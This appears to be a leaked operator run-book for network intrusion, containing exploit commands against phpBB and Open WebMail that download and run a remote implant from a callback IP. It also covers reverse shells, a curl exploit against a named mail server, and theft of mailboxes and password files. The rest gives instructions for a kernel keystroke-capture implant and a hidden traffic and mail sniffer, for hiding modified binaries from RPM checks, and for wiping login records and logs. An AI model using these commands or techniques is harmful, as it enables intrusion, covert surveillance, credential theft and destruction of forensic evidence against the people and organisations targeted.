/usr/lib/libbz 2.so example: # Suppose we want to hide /usr/sbin/vsftpd frpm RPM $ whereis vsftpd vsftpd: /usr/sbin/vsftpd # Find the rpm package that is responsible for this file. $ rpm -qf /usr/sbin/vsftpd vsftpd-1.1.3-8 # Run the rpm "Verify" command on the vsftpd-1.1.3-8 package. rpm -V vsftpd-1.1.3-8 S.5....T /usr/sbin/vsftpd # S, 5, and T were output. This means the vsftpd binary has a different size, md5, and modification time than the # rpm database. -put /current/up/DIZZYTACHSTATIC rpmStatic # final command would be: $ ./rpmStatic -p vsftpd-1.1.3-8 -f /usr/sbin/vsftpd -s -m -t -d -r -c Reset: OK SigRepair: NO Lookup OK Sig Exists Reset: OK -d: OK -m: UPDATED -s: UPDATED -t: UPDATED Commit: OK Tested write of 8392 bytes Performed write of 8392 bytes Reset: OK -r: OK Commit: OK Tested write of 8392 bytes Performed write of 8392 bytes Reset: OK # Check to see if the "vsftpd" is now hidden from rpm $ rpm -V vsftpd-1.1.3-8 # This time, /usr/sbin/vsftpd is not output. Our modified file is now hidden from RPM! -rm rpmStatic ############################ ESMARKCONANT ################################## # Exploits a vulnerability in the phpBB forum software. # No authentication is required. # target to be running phpBB less than version 2.0.11 # usage: ./xp_phpbb.pl -i -t -c # -i # -t # -c #./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w" #./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -O sendmail;chmod +x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null" # 2 step troubleshooting -tunnel l 80 TARGET_IP r NETCAT_PORT nc 127.0.0.1 80 telnet 127.0.0.1 80 GET /phpBB2/ HTTP/1.0 # response should be: # Powered by phpBB 2.0.4 # determine if viewtopic.php is vulnerable ./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w" # response should have the output of the commands in the request: # ... #
cd /current/up #locally to setup fowget to put rat on target since no uudecode echo -e "HTTP/1.0 200\n" > new cat new noserver > sendmail nc -v -l -p NETCAT_PORT < sendmail # on PITCH -nrtun RAND_PORT # upload and execute nopen ./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://PITCH_IP:NETCAT_PORT/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:RAND_PORT PATH=. sendmail) 2>/dev/null" # clean web access log ######### SNMPWALK -tunnel u 161 TARGET_IP snmpwalk 127.0.0.1 -c COMMUNITY_STRING .system #snmpwalk -v1 -c Ult1mate 127.0.0.1 .system #snmpwalk -v2c -c Ult1mate 127.0.0.1 .system #snmpwalk -v1 -c tenkap 127.0.0.1 enterprises.9.9.23.1 # Software info.... snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson .system # Hardware info ..... snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 47.1.1.1.1.2 # CDP neighbors snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.9.23.1 # Flash Stuff snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 16 snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.2.10.17.1.1 # Arp Cache snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress # Route info # not sure on this one what you want.... # gives 1500 lines on our jetson.net switches snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipRouteTable |wc ##################################################### # EVOKEPROMPT ##################################################### # In netscape/mozilla to get magic cookie: # Tools->Cookie Manager->Manage Stored Cookies # click on your cookie; take note of name and Information # change name-sessionid and OWVSdif1.AMY to name and Information # for the following command # change callback IP in /etc/hosts, add the dns target name to 127.0.0.1 1.EVOKEPROMPT Software Description: - Exploits a vulnerability in a CGI against the Open WebMail system. The request is parsed by the openwebmail-folder.pl CGI and is transferred to a perl open call which allows arbitrary command execution. Open WebMail runs on FreeBSD, Linux, Solaris, and most Unix servers. - The Open WebMail system runs as "nobody", therefore a local exploit is needed if root access is required. - Since it's a logic error, the same exploit will work on all versions of Unix. 2.EVOKEPROMPT Usage: # ./xp_downloadfolder usage: ./xp_downloadfolder -i -u -a -b -p -c -i -p -c -u -a -b Examples: 1) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"mkdir /tmp/.scsi; cd /tmp/.scsi; catsendmail;chmod +x sendmail;sleep 60;PATH=. D=-c555.1.2.150:5555 sendmail" 2) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"PATH=/usr/bin w" 3) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"sh&0 2>&0" 3.Target Susceptablility: EVOKEPROMPT requires the target to be running Open WebMail 2.10 or higher. 4.On what will EVOKEPROMPT fail? Will not work on older versions of Open WebMail. Versions that will not work include Open WebMail 1.80, 1.90, 2.00. 5.EVOKEPROMPT Additional Requirements: Need username/password to authenticate. Local exploit based upon the operating system. Could use DTAPPGATHER for Solaris, rfork for FreeBSD, or ptrace for Linux. 6.Give troubleshooting instructions: There are the steps in troubleshooting EVOKEPROMPT: 1. Determine if the webserver is running Open WebMail 2.10 or higher: # galeon http://targetip/ 2. Determine the OS based upon "User Preference/About" in the Open WebMail system. 7.EVOKEPROMPT Example Usage: 1) # galeon http://127.0.0.1/ 2) Enter the UserID and Password. For the rest of this example, UserID is name. 3) Set up Nopen to listen for a connection. # noclient -l 123 or # -nrtun 123 4) View the cookie for "Site" (in this case, 127.0.0.1) and "Cookie Name" (in this case, name- sessionid). The value should be similar to this: OWVSdiyf1.AMY 5) Also, need to use the session ID in the URL, for example: sessionid=name*-session-0.2724838 93045322 6) Send the exploit using xp_downdloadfolder with the above information: # ./xp_downloadfolder -i127.0.0.1 -uname -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"mkdir / tmp/.scsi; cd /tmp/.scsi; catsendmail;chmod +x sendmail;sleep 60;PATH=. D=-c555.1.2.150:123 sendmail" # this worked on faintspirit ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" # others ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWXIer7nk2%2FpM" -b0.535692078600736 -c"(sh&0 2>&0)" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"sh&0 2>&0" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/w; /bin/date" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://203.234.72.4:443/sendmail; chmod 700 sendmail; PATH=. D=-c203.234.72.4:46776 sendmail" # abort the curl command, then modify the string to have the "ow-sessionkey-mail.ihep.ac.cn-", https://127.0.0.1:443, and "=tonggl*mail.ihep.ac.cn-session-" info included # wget nopen (this worked): curl --cookie "ow-sessionkey-mail.ihep.ac.cn-tonggl=OWKyenMN8jyV2" "https://127.0.0.1:443/cgi-bin/openwebmail/openwebmail-folder.pl?sessionid=tonggl*mail.ihep.ac.cn-session-0.125111049580486&folder=|(echo%20%27mkdir%20FtmpFEscsi%3B%20cd%20FtmpFEscsi%3B%20FusrFbinFwget%20http%3AFF2G3E234E72E4%3A443Fsendmail%3B%20chmod%207GG%20sendmail%3B%20PATH%3DE%20D%3D-c2G3E234E72E4%3A46776%20sendmail%27%7CPATH%3D%60printf%20%27%5C057usr%5C057bin%27%60%20tr%20E-G%20.-0%7CPATH%3D%60printf%20%27%5C057bin%27%60%20sh)&action=downloadfolder" ### In a local scripted window, set up a netcat to listen for a connection: nc -vv -l -p NETCAT_PORT ### try connecting via netcat after any "session failed" message when redirecting: unset HISTSIZE unset HISTFILESIZE unset HISTFILE w uname -a ### start a netcat with the right nopen version (don't need to uuencode with /dev/tcp way) ### nc -l -p NETCAT_PORT < sendmail pwd mkdir /tmp/.scsi; cd /tmp/.scsi; pwd ls -l /usr/bin/uudecode /bin/cat/tmp/.scsi/sendmail chmod 700 sendmail PATH=. sendmail id grep -v "203.234.72.4" /home/ihep/tonggl/.openwebmail -gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/tonggl/.openwebmail/history.log -gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/chep2001/.openwebmail/history.log -gs grepout -d -w /tmp/.scsi "203.234.72.4" /var/log/openwebmail.log grep -v "203.234.72.4" /var/log/openwebmail.log> o; cat o > /var/log/openwebmail.log 7) Check the following logs and directories: /home/name/.openwebmail/history.log /var/log/httpd/access_log /var/log/openwebmail.log /home/name/mail /home/name /var/www/cgi-bin/openwebmail/etc/sessions/ ##################################################### # POPPING MAIL FROM A TARGET ##################################################### ### You'll be listing the messages from within a scripted window ### You'll need to devise a way to separate the mail for multiple users (for tuckering) ### if you are accessing more than one account ### You might try using a separate scripted window for each user, then copying ### the scripted window to the name of the user for post-processing ### The session timeout is fairly short so have your commands ready to paste ### You have to "guess" where the newest mail is, so you might want to start ### backwards to get the most recent mail, IF that applies and the mail is ### sorted by date ### IMPORTANT!!!!!! DO NOT "QUIT" THE SESSION!!!! LET IT TIMEOUT, ### OR CLOSE THE TUNNEL TO HAVE IT DROP THE CONNECTION. ### You do not want the mail marked as "read" or anything else. ### set up tunnels on redirector: -tunnel l 110 TARGET_IP ### in a local scripted window: telnet 127.0.0.1 110 USER PASS LIST RETR 1 RETR 2 RETR 3 RETR 4 RETR 5 RETR 6 RETR 7 RETR 8 RETR 9 RETR 10 ... ... ... ### If the session hasn't timed out, close the tunnel channel to move on to the ### next user or to end the op ############################################################################# ############ I AM ROOT! ############################################################################# ###path with NO Working directory for atjob #-setenv PATH=:/usr/bsd:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc -setenv PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin HISTFILE="" ksh # or unset HISTFILE unset HISTSIZE unset HISTFILESIZE -ls -rm sendmail sendmail.uu # Look for and clean (if necessary) logs ###### FORENSICS ############## =info df -k -find -gs survey -ls /var/spool/cron/crontab -strings /platform ## /platform/SUNW,SystemEngine ### See who's on, note uptime and load; verify time/timezone; see who's been on w; date; last -80 ### Change owner/group/modes...if in doubt, see what's already in "/tmp"... -ls -t / /tmp ### core files? -ls /core ### Root users: -ls /var/adm/sulog -vget /var/adm/sulog ### owner:group should be root:sys... chown -R root:sys /tmp/.scsi; chmod -R og-rwx /tmp/.scsi; ls -al ### Baseline swap /sbin/ps -elf; swap -l; uptime ### Enough space to upload tools? Any partitions about to fill up? df -k ################ OTHER CLEANING ################ ################################# ### TOAST the login entries..... ################################# ### Target window -put ../up/toast t ### TO VIEW... ./t -u /var/adm/utmp ./t -u /var/adm/wtmp | tail -20 ./t -x /var/adm/utmpx ./t -x /var/adm/wtmpx | tail -20 ./t -l /var/adm/lastlog | tail ### TO ZAP... ./t -u /var/adm/utmp tty date ./t -u /var/adm/wtmp tty date ./t -x /var/adm/utmpx tty date ./t -x /var/adm/wtmpx tty date ./t -l /var/adm/lastlog /var/adm/wtmp[x] user ################################# ### SGREP messages ################################# -put ../up/sgrep s -tail /var/adm/messages ### To look first: ./s "unique string" /var/adm/messages ### To replace with a string of equal or shorter length ./s "unique string" "replacement string" /var/adm/messages ################################# ### SGREPSUB (numerous things to grep) ################################# usage: sgrepsub -i /tmp/messages -r /tmp/rand -c 31 -i -r -c to find the column number> -h -f -s ex: sgrepsub -i /tmp/messages -r /tmp/rand -c 31 -f /var/log/messages ### Locally, create a file containing the lines you want to change from /var/adm/messages cd /current/down vi sg.input ### Locally, create a 2nd file containing one or more lines of replacement strings cd /current/down vi sg.repl ### Locally, run sgrepsub -i sg.input -r sg.repl -c -f /var/adm/messages -s ./s ### Verify the output, then paste the generated commands in the target window ################################# ### PCLEAN (put up right one) ################################# -put ../up/pcleanTAB sendmail -ls ### make sure to exit all but one window (processes log upon completion) ### Pclean usage: ### -e: look for null entries ### -i: calc number of entries in file ### -r: looks for entries with gid=root ### -t: search this time range ### -l: search for last X hours ### -S: ignore matches in the following string? ### Usage: ./pclean [-h(elp)] [-d] [selection_option(s)] [filename] -d: DELETE selected entries Selection options: (Two or more selection options are ANDed together) -------------------------------------------------------------------- no options: print all entries to stdout and exit -h(elp): self expl -e: list null entries; all other select criteria ignored -f fname: delete whitespace-separated numeric entries listed in "fname" (numbers must be in numeric order -- try the "sort -n" option if necessary) -r: list entries w/ gid == root -i calculate # of entries in the file (all other selection options ignored) -l num_hrs list entries whose start time was within last num_hrs hours -n numeric_list: select numeric ranges and/or individual entries (numeric list CANNOT have spaces and MUST be in numeric order and comma-separated) e.g.: -n 1-1024,1080,6666,31337 ** NOTE: USING EITHER THE -n OR -L OPTION CAN ** SIGNIFICANTLY IMPROVE PROCESSING TIME -L number: select the last number of entries ** NOTE: USING EITHER THE -n OR -L OPTION CAN ** SIGNIFICANTLY IMPROVE PROCESSING TIME -k numeric_list: slower version of -n (doesn't use lseek) -t time_range: entries that fall within time range, specifed as [[CC]YY]MMDDhhmm[.SS]-[[CC]YY]MMDDhhmm[.SS] (no spaces) e.g. 8 Jul 1999 from 10am to 11am: -t 199907081000-199907081100 -c cmd_name: strncmp() search for 1st 8 chars of commands that match cmd_name -s "cmd1|cmd2|...": strncmp() search for 1st 8 chars of commands that DO match a list of '|' separated strings (kinda like egrep) -S "cmd1|cmd2|...": strncmp() search for 1st 8 chars of commands that DON'T match a list of '|' separated strings (kinda like egrep -v) ### LOCALLY, make pclean dir -lsh mkdir /current/down/pclean ### Make sure your path is correct: ### redo path with WORKINGDIR -addpath . ### or equivalently: ### DEC: #-setenv PATH=/usr/.advtags:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb ### OTHER: #-setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb ### newer way #### Checks number of processes in file? Informational #### This one doesn't do any cleaning yet. sendmail -i; date ### This works for ICESKATE (DEC) #sendmail -r -l 4 -S "sendmail|imapd|idled|mail.lo|popper|sshd|in.ident|syslogd|telnetd|ipop3d|imapd" > T:/current/down/pclean/o ## safest way for SPARC sendmail -l 4 > T:/current/down/pclean/o ### Locally, edit file and remove any excess entries ### Use following on local host to convert into input format: cp o o.orig ### Delete header and footer lines, along with any processes that ### don't appear to be us vi o ### Convert the file into input format (process ref numbers only): OR in vi: :%s/ .*//g cut -f1 -d ' ' o > i # or cut -f1 -d ' ' o.grep > i ### Verify the file to be uploaded is correct: cat i ### upload input file -put /current/down/pclean/i i -ls ### DON'T RUN ANY MORE NON-BUILTIN COMMANDS ON TARGET AFTER THIS COMMAND!!!!! ### Delete our entries sendmail -d -f i > T:/current/down/pclean/o.after ### Locally, edit file and remove any excess entries ### verify pclean worked: cat o.after ### Paste the final 'sendmail' cleanup line from o.after on the target ### until it says "no entried selected" ### Extra cleanup ### reset timestamp on /usr after rm /usr/.advtags -rm sendmail i ### DO NOT RUN ANY MORE NON-BUILTIN COMMANDS or you'll HAVE TO PCLEAN AGAIN!!!! ###################################################################################### ### check logs #grep 217.53.1.2 /var/adm/SYSLOG /var/log/syslog grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages ### Get a reboot history through a combination of the following: ### Take note if anyone was on the console around the time of any reboots last | egrep "down|boot|console" last -15 boot -tail /var/adm/sulog #### CHECK FOR ACCOUNTING... -ls /var/adm/*acct -ls -t /var/spool/cron/crontabs grep acct /var/spool/cron/crontabs/* -ls /var/spool/cron/atjobs grep acct /var/spool/cron/atjobs/* #### (1) What's the current local time? ### (2) Is the platform close to what we thought? ### (3) Do we have some available disk space? ### (4) Are there currently any at jobs? date; uname -a; df -k; at -l ### check for remote monitoring #-ls -t /var/adm/syslog.dated #-ls -t /var/adm/syslog.dated/current/ #-tail -70 /var/adm/syslog.dated/current/auth.log #-tail -70 /var/adm/syslog.dated/current/daemon.log #-tail -70 /var/adm/syslog.dated/current/mail.log #-tail -70 /var/adm/syslog.dated/current/others.log #egrep "PITCH_IP|inetd| ident" /var/adm/syslog.dated/current/*.log ### check other logs -ls -t /var/adm -ls -t /var/log ####### LINUX VALIDATOR TECH CHECKS: hostname =mkoffset -ifconfig ### Looking for libint.so in maps: -ls /proc/1/ cat /proc/1/maps ### check access times: -lt /lib/libinit.so -ls -u /lib/libinit.so ### should NOT exist: -lt /etc/ld.so.preload ### see if lock file is there, pull if not too big: -lt /var/spool/lpd/_default -get /var/spool/lpd/_default/ ### check reboots: -ls -t /var/log/*ksym* ### check logs around time of last callback: -ls -t /var/log/mess* -get /var/log/mess* ### pull this (should compress well): -lt /var/log/lastlog -get /var/log/lastlog -ls -t /root -get -v /root/.bash_history ############# For LINUX -ls /var/spool/cron -ls /var/run/utmp -ls /var/log/wtmp netstat -an netstat -anlp ###### shows dates of reboots: -lt /var/log/ksyms* ### Like uname -a -cat /etc/*release uname -a ### Like psrinfo -v: cat /proc/cpuinfo # Kernel info - vmlinux stat /dev stat /sbin/init -lt /boot -get /boot/System.map* -lt /etc -get /etc/lilo.conf mount -ls /sbin/init cksum /sbin/init lsmod -ls /sbin ls -l /proc/1/exe -ifconfig netstat -npa # For SS /proc/config.gz /boot/config-`uname -r` /proc/version /usr/src/linux-`uname -r`/.config /usr/src/linux-`uname -r`/configs/*.config # For JL rpm -qa |grep xinet -strings /usr/sbin/xinetd |grep Version -get /usr/sbin/xinetd -ls /etc/xinetd.conf grep "disable" /etc/xinetd.d/* chkconfig --list ######## END FORENSICS ########################## ############- Create our slash and burn at job cd /; echo "rm -rf /tmp/.scsi > /dev/null 2>&1" | at now + 180 minutes cd /; echo "kill -9 ###FINSPID### > /dev/null 2>&1" | at now + 180 minutes at -l; date ### vi commands to (1) mark, (2) modify file for at job, (3) jump back here mx :%s/at -r ### /at -r /g `x ### redo path with WORKINGDIR -setenv PATH=/tmp/.scsi:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb ### What protocols are serviced by 'inetd'... grep -v "^#" /etc/inetd.conf ### Which facilities and levels are getting logged to which files/hosts... grep -v "^#" /etc/syslog.conf ### Named config files -ls /etc/named* -ls /var/named* ### ASET (Automated Security Enhancement Tool) CHECK... ### ### After connecting and creating/cd-ing to your "working ### directory" in /tmp grep aset /var/spool/cron/crontabs/* ### if aset if running, look for path after the "-d" option ### i.e. 0 0 * * * /usr/aset/aset -d /usr/aset ### /usr/aset would be the path we're looking for ### if this path is _not_ /usr/aset, run the following commands ### as is AND a second time replacing /usr/aset with the path ### from the cron job #ls -al /usr/aset #ls -al /usr/aset/reports/latest ### ASET Tasks... #ls -al /usr/aset/tasks #tar cvf as.t /usr/aset/tasks; ls -la #### ASET Archives... #ls -al /usr/aset/archives #tar cvf as.a /usr/aset/archives; ls -la #### ASET Master Files... #ls -al /usr/aset/masters #tar cvf as.m /usr/aset/masters; ls -la #### Download any ASET tar files and remove from tmp dir on target ################ Locally, look thru find ################################ #### Typical grep's on downloaded 'find' file #### Do on local host after downloading files. Collectively... cd /current egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' *m ## or, singly... grep cgi-bin *m grep tftpboot *m grep cisco *m grep router *m grep hack *m grep "\.\.\." *m grep ssh *m grep tac *m |egrep '(passwd|pwfile|etc|wtmp|conf|plus)' #### Since we're looking at 'find', TRIPWIRE could be elsewhere, too... #### Collectively... egrep '(trip|twz|tw\.config)' *m # or, singly... grep trip *m grep twz *m grep "tw\.config" *m ### look for history files grep history *m ### Extra -local window #lsstamp -c 2 -s sorts based on atime (good for finding config files) #lsstamp -c 3 -s sorts based on ctime (good for finding hacker activity) # OR # ./mkfinds -h # ./mkfinds ################################################################################### ################################################################################### ### PASSWD FILE? # get -l option will disconnect absolute path locally -ls /etc/passwd /etc/shadow -get -l /etc/passwd /etc/shadow ############# MAILGRAB ############################## # Strifeworld Collection -setenv PATH=/tmp/.scsi:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin who -b ###################################################### # SUCTIONCHAR ###################################################### # 32 or 64 bit OS - solaris sparc 8,9 # Kernel level implant - transparent, sustained, or realtime # interception of procoess input/output vnode traffic. # retrieve later # filter: ssh, telnet, rlogin, rsh, password, login, csh , su # max bytes collected per session is 32 kilobytes # max bytes collected for all sessions is 1 megabyte # don't take up more than 1% of system's memory # to determine if suctionchar is loaded on a system is to # open a command channel to the implant as described in # authenticate and yyserv tool and demo sections. If this # fails and receives the error "Bad Address" when trying to # modload the instant grat module; function call needs patch # can't be found, probably because already been patched by a # version of suctionchar already running # SUCTIONCHAR will go away at reboot # if offset involved with target, must set op box time to match target time # INSTALLING SUCTIONCHAR uname -a isainfo -v -cd /tmp/.scsi cp /usr/sbin/modload ml cp /usr/sbin/modinfo mi ### if running 32 AND 64 bit, upload 64 bit: # 64 bit -put /current/up/sparcv9/sum sum # else 32 bit -put /current/up/sum sum -lt sum ### install it: ./ml sum ### make sure sum doesn't show up in modinfo: ./mi ### note size of sum for dd command: -lt sum ### Run dd to zero out 'sum' binary so its contents can't be recovered from disk after deletion # # say size of sum is 34364, need for count in dd # dd bs=1 count=34364 if=/dev/zero of=sum -rm sum ml mi ### nothing should have logged: -tail /var/adm/messages ##### NOPEN SUCTIONCHAR COMMANDS ######## [-suc] Usage: -suc [get|] | [-s] [..] | blow | info | filter | free | unhook -suc info # shows if installed and bytes collected, max s and max c -suc filter # set filters /current/etc/suctionchar.sample.conf # locally to give pastable for -suc filter: # make filter.conf file /current/bin/suctionchar.genconf /current/etc/suctionchar.sample.filter.conf # paste filter in one at a time from genconf bottom output until all filters # in; filter saved message appears -suc get # get data, decrypt, view -suc blow # remove suctionchar -suc -s pid [pid] # on the fly tracking of process to screen -suc free # free memory of suctionchar data -suc unhook # unhook any realtime process with -s to screen # on target: to authenticate must run yyserv on target and # /current/etc/suctionchar.authenticate locally # authenticate by hand, our opbox time must be set exactly to authenticate cp /bin/cat yyserv -shell echo $$ # notice pid ./yyserv # to exit # 1 -- copy magic string from local authenticate window # 3 -- copy first response from local authenticate window # 5 -- copy second response from local authenticate window info OK info exit # locally cd /current/bin ./suctionchar.authenticate # 2 -- place PID from echo $$ on target (-shell) # 4 -- challenge= copy from yyserv output string inbetween first response string # yyserv commands # info - stats on collected sessions info # filt - reprogramming the filter rules it is running; intended to only be # used with commands generated by genconf filter # copy filters one by one based on local genconf output # file - writes out collected data to disk; file name in double quotes # ex: "/tmp/filename"; should receive ERROR if wrong, WROTE to "/tmp/filename" file "/tmp/.scsi/d # in nopen window not running yyserv -get /tmp/.scsi/d -rm /tmp/.scsi/d # locally /current/etc/suctionchar.decrypt PATH/d outfile # free - deallocates memory to store collected data; should always get OK free # hook - realtime snooping of existing processes # ex: hook PID # unho - unhooking any realtime hooked processes # sets - set maximum bytes collected per session (MAX S =) # setc - set maximum total bytes, across all collected sessions, used to # store data in memory (MAX C =) # unpa - unpatch itself from the kernel # exit - send kill to yyserv # when finished using yyserv manually, make sure cleaned up properly ps -ef | grep yyserv -lt -rm yyserv -cd /tmp -rm /tmp/.scsi ###################################################### # STRIFEWORLD ###################################################### ### ### IMPORTANT: make note of PID,PPID that strifeworld reports when you start it and save it in opnotes ### ### man page: cd /current/etc nroff -man strifeworld.1 ############ Start STRIFEWORLD ##################### ### upload strifeworld as sendmail (or something else that might blend in) -put /current/up/strifeworld sendmail ### Sniffing syntax: #PATH=. E="port 23 and host (210.56.16.1 or 210.56.4.1)" C="-o/tmp/.nfs7254 -n. -ihme0 -a3000 -b10000 -x100" sendmail #PATH=. E="port 23" C="-o/tmp/.nfs7254 -n. -ihme0 -a3000 -b10000 -x100" sendmail ### Task mail: #PATH=. E="port 25" C="-o/tmp/DIR -f(user1 user2) -ihme0 -a3000 -b100000 -j10000000" sendmail #PATH=. E="port 25" C="-o/tmp/DIR -f([^a-zA-Z0-9_-](user1|user2|user3)@) -ihme0 -a3000 -b100000 -j10000000" sendmail #PATH=. E="port 25" C="-o/platform/SUNW,SystemEngine/kernel/drv/scsi -f([^a-zA-Z0-9_-](user1|user2|user3)@) -ihme0 -a3000 -b100000 -j10000000 -x100 -l" sendmail ### Dump to hidden directory: ### to hide on a sparc system -lt platform/SUNW,SystemEngine/kernel/drv PATH=. E="port 23" C="-m -o/platform/SUNW,SystemEngine/kernel/drv/.scsi -n. -i iprb0 -a3000 -b10000 -x100 -l" sendmail ### to hide file on an x86 system -lt /platform/dvri86pc/kernel/drv PATH=. E="port 23" C="-m -o/platform/dvri86pc/kernel/drv/.scsi -n. -i iprb0 -a3000 -b10000 -x100 -l" sendmail ### make note of PID,PPID it echos back and document the command used to start it ### verify it's running and hidden: ps -ef | grep PID cd /dev; ps -ef |grep " sendmail" # or echo "p\nq\n"|crash|grep sendmail # Should see sendmail with . echo "p\nq\n"|crash|grep PID # Should see sendmail with . ############ Dump STRIFEWORLD ##################### ### first, change local dir to either mailpull or sniffer: -lcd /current/down/sniffer/TARGET_NAME.TARGET_IP -lcd /current/down/mailpull/TARGET_NAME.TARGET_IP ### dump via built-in: =swkill ### dump by hand: ### figure out sw PID and replace it in line below: #A=PID export A; kill -USR1 $A; sleep 1;kill -USR2 $A;sleep 1; kill -USR1 $A;sleep 1;kill -USR2 $A -ls -t /tmp -get -l /tmp/file1 /tmp/file2 -rm /tmp/file1 /tmp/file2 -ls -t /tmp ### or if in a hidden directory (filename usually 'scsi'): -ls /platform/SUNW,SystemEngine/kernel/drv/scsi -ls /platform/dvri86pc/kernel/drv/scsi -get -l FILENAME cat /dev/null > FILENAME -lt /platform/SUNW,SystemEngine/kernel/drv -lt /platform/dvri86pc/kernel/drv ######### To grep headers from strifeworld mail collection: ############## wc -l /tmp/file1 /tmp/file2 ### while on target: #P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|^To:|^From:|^Subject:|filename=)" /tmp/.nfs6218 ### when done locally: #P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|^To:|^From:|^Subject:|filename=)" /current/down/mailpull/TARGET_NAME.TARGET_IP ############# MAILGRAB ############################## ### Multiple mail pulls -lcd /current/down/mailpull/TARGET_NAME.TARGET_IP ##### or use -chili # -chili -s 1 -l mm-dd-yyyy /var/mail USER1 ## after down, check size locally cd /current/down/mailpull/TARGET_NAME.TARGET_IP # look at SA mail -tail /var/adm/sulog -ls /var/mail/USER grep -n -i "^Subject: " /var/mail/USER ### Generic stuff ### SUBJECT/DATE/FROM/TO/E-MAIL ATTACHMENTS Normal... #cd /var/mail; egrep '(^Subject:|^Date:|^From:|^To:|name=)' * ############### Get ready to cleanup ################################### ### redo path with WORKINGDIR -setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb ############- ZAP OUR AT JOB at -l at -r ### ; at -l ############ HEALTH CHECK ######################### ### Run the following before pcleaning to baseline system health prior ### to end of op w; date; last -80 /sbin/ps -elf; swap -l; uptime ps -ef |grep " sendmail" -pid df -k -ls -t / -tail -50 /var/adm/messages -ls -t /var/log /var/cron /var/adm #### ### Clean up and Bail #### ### Remove working dir, reset timestamp, rm touchfile, verify /usr and /tmp ### then -cd /tmp -rm /tmp/WORK_DIR YES -ls /tmp #### ## Kill off all remote nopen server processes... #### -burn BURN #### Try reconnecting to make sure noserver died ###### End of user.mission; You're done!!!! ######################## ### ### END USER.MISSION File user.mission.generic.COMMON ### (see also ../etc/user.mission.generic.COMMON) ### ### BEGIN File user.tool.pork.COMMON (see also ../etc/user.tool.pork.COMMON) ### ##### Triggering PORK ##### ### Need 4 scripted windows ### Window 1: local, run pork client ### Window 2: nopen tunnel window on redirector ### Window 3: window to establish Nopen connection on redirector ### Window 4: packrat window ### Search/Replace stuff ### TARG_IP: box that has pork installed ### TARG_PORT: pork'ed port ### REDIR_IP: box hitting TARG_IP ### NETCAT_PORT: port to upload nopen ### NOPEN_PORT: port to start nopen on ### SPECIAL_SOURCE_PORT: source port of connection to pork ### (source port must be one of: 3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201) ### TEMP_DIR: temp directory ### TIME_ADJ: time diff between local GMT and targ GMT (use 0 if no diff) ### (must be within 12 hrs) mx :%s/TARG_IP/TARG_IP/g :%s/TARG_PORT/TARG_PORT/g :%s/REDIR_IP/REDIR_IP/g :%s/NETCAT_PORT/NETCAT_PORT/g :%s/NOPEN_PORT/NOPEN_PORT/g :%s/SPECIAL_SOURCE_PORT/SPECIAL_SOURCE_PORT/g :%s/TEMP_DIR/TEMP_DIR/g :%s/RAT_REMOTE_NAME/RAT_REMOTE_NAME/g :%s/TIME_ADJ/TIME_ADJ/g 'x ### Window 2: Set up tunnel to talk to pork -tunnel r NETCAT_PORT # If pork'ed service is TCP l TARG_PORT TARG_IP TARG_PORT SPECIAL_SOURCE_PORT # If pork'ed service is UDP u TARG_PORT 